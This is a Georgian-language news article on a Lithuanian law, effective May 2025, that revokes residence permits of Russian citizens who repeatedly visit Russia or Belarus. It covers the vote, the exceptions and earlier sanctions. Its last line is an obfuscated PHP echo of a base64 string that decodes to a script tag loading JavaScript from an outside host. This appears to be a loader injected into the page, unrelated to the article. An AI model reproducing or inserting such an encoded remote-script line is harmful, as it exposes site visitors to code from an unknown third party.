gorgia
ავერსი jaluzi

ლიეტუვაში ბინადრობის ნებართვის მქონე რუსებს რუსეთში ან ბელარუსში ჩასვლის გამო ეს ნებართვა გაუუქმდებათ. შესაბამისი დებულება ლიეტუვის სეიმმა რუსეთისა და ბელარუსის მოქალაქეების წინააღმდეგ მოქმედ ეროვნულ სანქციებს დაამატა, რითაც ისინი კიდევ უფრო გაამკაცრა.

ცვლილებები ძალაში 2025 წლის 3 მაისს შედის, რაც ლიეტუვის პარლამენტის ოფიციალურ ვებგვერდზე გამოქვეყნდა.

კერძოდ, დოკუმენტის თანახმად, რუსეთის მოქალაქისთვის გაცემული ბინადრობის ნებართვა გაუქმდება, თუ ის სამი თვის განმავლობაში ორჯერ ან მეტჯერ ეწვევა რუსეთს ან ბელარუსს. ასევე, განიხილებოდა ამ ზომის ბელარუსის მოქალაქეებზე გავრცელების შესაძლებლობაც, თუმცა დეპუტატებმა ინიციატივას მხარი არ დაუჭირეს.

ცვლილებები ხმათა აბსოლუტური უმრავლესობით იქნა მიღებული: მომხრე 115 დეპუტატი იყო, ხოლო ერთმა თავი შეიკავა.

კანონი გამონაკლისებსაც ითვალისწინებს და არ ვრცელდება იმ პირებზე, რომლებიც რუსეთში ან ბელარუსში „ობიექტური და დამოუკიდებელი“ მიზეზებით იმყოფებოდნენ. ასევე, შეზღუდვები არ იმოქმედებს იმ კომპანიების თანამშრომლებზე, რომლებიც ევროკავშირის ქვეყნებს შორის სატვირთო და სამგზავრო გადაზიდვებით, მათ შორის, ლიეტუვის ტერიტორიაზე ტრანზიტით არიან დაკავებული.

კანონის განმარტებით ბარათში წერია, რომ „არსებული საფრთხეების გათვალისწინებით, ეს ზომები აუცილებელი და მიზანშეწონილია.“

ცნობისთვის: ლიეტუვამ რუსეთისა და ბელარუსის მოქალაქეების წინააღმდეგ ეროვნული შეზღუდვების დაწესება 2023 წლის მაისში, უკრაინის წინააღმდეგ რუსეთის მიერ მიმდინარე აგრესიის საპასუხოდ დაიწყო. კერძოდ, ვილნიუსმა რუსებისგან დროებითი ბინადრობის მოთხოვნით განაცხადების მიღება იმ შემთხვევების გარდა შეწყვიტა, თუ განმცხადებელს შენგენის ან ეროვნული ვიზა, ასევე, ლიეტუვაში ან ევროკავშირის სხვა ქვეყანაში ბინადრობის ნებართვა აქვს. ამის გარდა, რუსეთის მოქალაქეებს ლიეტუვაში უძრავი ქონების შეძენა აეკრძალათ.

218
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");